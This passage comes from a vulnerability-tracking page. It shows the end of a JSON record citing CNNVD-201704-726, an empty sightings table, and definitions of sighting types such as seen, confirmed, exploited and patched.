"id": "CNNVD-201704-726" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.